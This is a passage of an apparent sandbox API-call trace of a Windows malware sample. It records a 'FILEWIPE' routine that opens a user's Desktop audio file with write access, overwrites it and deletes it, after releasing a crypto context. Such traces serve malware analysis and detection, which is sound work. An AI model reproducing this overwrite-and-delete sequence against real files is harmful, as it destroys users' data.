lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0165.413] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0165.413] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0165.413] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0165.413] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0165.413] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0165.414] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0165.414] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0165.414] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0165.414] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0165.414] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0165.414] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0165.414] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.414] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0165.414] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.414] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0165.414] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0165.414] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0165.414] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.414] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0165.414] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0165.414] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.414] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0165.414] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0165.414] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0165.414] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0165.415] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.415] CryptReleaseContext (hProv=0x9c0c00, dwFlags=0x0) returned 1 [0165.415] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.415] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0165.415] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0165.415] FreeLibrary (hLibModule=0x74f20000) returned 1 [0165.416] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.416] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.416] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.416] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.418] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.419] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0165.419] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0165.419] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.422] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.422] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28da0830, ftCreationTime.dwHighDateTime=0x1d5dc11, ftLastAccessTime.dwLowDateTime=0x8d38b190, ftLastAccessTime.dwHighDateTime=0x1d5e405, ftLastWriteTime.dwLowDateTime=0x8d38b190, ftLastWriteTime.dwHighDateTime=0x1d5e405, nFileSizeHigh=0x0, nFileSizeLow=0xda2c, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="oB O9kLZ7MPDb_Fa.mp3", cAlternateFileName="OBO9KL~1.MP3")) returned 0x90af58 [0165.423] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0165.423] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.423] CharLowerBuffW (in: lpsz="byte[55852]", cchLength=0xb | out: lpsz="byte[55852]") returned 0xb [0165.424] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.424] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0165.424] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.424] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0165.424] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0165.424] FreeLibrary (hLibModule=0x75c90000) returned 1 [0165.425] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.425] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.425] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.425] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0165.425] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.425] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.425] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.425] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.425] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.425] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.425] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.425] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.425] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.425] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.425] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.425] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.425] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.425] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.425] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.425] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.426] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0165.426] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0165.426] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ob o9klz7mpdb_fa.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0165.426] FreeLibrary (hLibModule=0x75990000) returned 1 [0165.426] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.426] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.426] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.426] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0165.426] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.426] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.426] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0165.427] FreeLibrary (hLibModule=0x75990000) returned 1 [0165.427] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.427] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.427] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.427] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.427] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0165.427] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.427] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.427] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0165.428] FreeLibrary (hLibModule=0x75990000) returned 1 [0165.428] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.428] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.428] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.428] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3", lpFilePart=0x0) returned 0x3a [0165.429] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28da0830, ftCreationTime.dwHighDateTime=0x1d5dc11, ftLastAccessTime.dwLowDateTime=0x8d38b190, ftLastAccessTime.dwHighDateTime=0x1d5e405, ftLastWriteTime.dwLowDateTime=0x8054560, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xda2c, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="oB O9kLZ7MPDb_Fa.mp3", cAlternateFileName="OBO9KL~1.MP3")) returned 0x90af58 [0165.430] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ob o9klz7mpdb_fa.mp3")) returned 1 [0165.432] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28da0830, ftCreationTime.dwHighDateTime=0x1d5dc11, ftLastAccessTime.dwLowDateTime=0x8d38b190, ftLastAccessTime.dwHighDateTime=0x1d5e405, ftLastWriteTime.dwLowDateTime=0x8054560, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xda2c, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="oB O9kLZ7MPDb_Fa.mp3", cAlternateFileName="OBO9KL~1.MP3")) returned 0 [0165.432] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0165.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0165.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0165.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0165.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0165.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0165.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0165.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0165.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0165.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0165.433] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0165.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0165.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0165.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0165.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0165.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0165.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0165.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0165.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0165.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0165.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0165.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0165.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0165.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0165.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0165.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0165.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0165.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0165.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0165.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0165.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0165.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0165.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0165.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0165.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0165.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0165.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0165.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0165.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0165.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0165.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0165.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0165.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0165.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0165.435] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0165.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0165.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0165.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0165.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0165.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0165.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0165.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0165.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0165.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0165.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0165.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0165.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0165.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0165.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0165.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0165.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0165.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0165.436] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0165.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0165.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0165.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0165.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b50 [0165.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0165.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0165.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0165.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0165.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0165.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd348 [0165.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0165.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0165.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0165.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0165.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0165.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0165.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0165.436] 